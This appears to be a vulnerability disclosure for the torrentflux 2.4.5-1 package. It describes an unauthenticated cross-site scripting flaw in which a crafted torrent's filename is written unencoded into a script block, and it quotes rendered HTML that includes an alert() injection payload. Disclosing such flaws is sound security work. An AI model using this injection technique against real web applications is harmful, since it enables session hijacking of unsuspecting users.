Package: torrentflux Version: 2.4.5-1
The XSS that can be triggered by an unauthenticated attacker. A malicious torrent file such as the POC attached can be crafted and shared by an attacker. Upon starting the download from Torrentflux, some of the file contents are pasted without output encoding into a script section, triggering the XSS. An alternate vector (authenticated) is for an attacker to upload the torrent file to his own account and subsequently share a link the torrent's details ( <http://www.vulnserver.com/torrentflux/details.php?torrent=pclinuxos_kde_201 3.12.torrent> www.vulnserver.com/torrentflux/details.php?torrent=pclinuxos_kde_2013.12.tor rent). </td></tr></table><br><div align="left" id="BodyLayer" name="BodyLayer" style="border: thin solid #000000; position:relative; width:740; height:500; padding-left: 5px; padding-right: 5px; z-index:1; overflow: scroll; visibility: visible"><link rel="StyleSheet" href="dtree.css" type="text/css" /><script type="text/javascript" src="dtree.js"></script><table><tr><tr><td width="110">Metainfo File:</td><td>pclinuxos_kde_2013.12.torrent</td></tr><tr><td>Directory Name:</td><td>pclinuxos-kde-2013.12</td></tr><tr><td>Announce URL: <URL:%3c/td%3e%3ctd%3ehttp://linuxtracker.org:2710/0000000000000000000000000 0000000/announce%3c/td%3e%3c/tr%3e%3ctr%3e%3ctd> </td><td>http://linuxtracker.org:2710/00000000000000000000000000000000/annou nce</td></tr><tr><td valign="top">Comment:</td><td>pclinuxos-kde-2013.12</td></tr><tr><td>Created :</td><td>December 4, 2013, 12:37 pm</td></tr><tr><td>Torrent Size:</td><td>1698693120 (1.58 GB)</td></tr><tr><td>Chunk size:</td><td>2097152 (2 MB)</td></tr><tr><td>Selected size:</td><td id="sel">0</td></tr></table><br> <form name="priority" action="index.php" method="POST" ><input type="hidden" name="torrent" value="pclinuxos_kde_2013.12.torrent" ><input type="hidden" name="setPriorityOnly" value="true" ><script type="text/javascript"> var sel = 0; d = new dTree('d'); d.add(4,-1,"/",-1,0); d.add(0,4,"kde-2013.12.jpg (78175)",-1,78175); d.add(1,4,"pclinuxos-kde-2013.12.iso (1697839104)",-1,1697839104); d.add(2,4,"pclinuxos-kde-2013.12.md5sum (60)",-1,60); d.add(3,4,"X");alert('X');//pg (181733)",-1,181733); document.write(d); sel = getSizes(); drawSel(); Please find attached the full proof of concept torrent file. -- Nicolas Guigo Senior Security Engineer iSEC Partners (NCC GROUP) (206) 948-3687 9C80 28B2 F016 4DA4 24C9 D1D7 129C FDF6 0CDC B828
pclinuxos-kde-2013.12.torrent
Description: application/bittorrent
smime.p7s
Description: S/MIME cryptographic signature

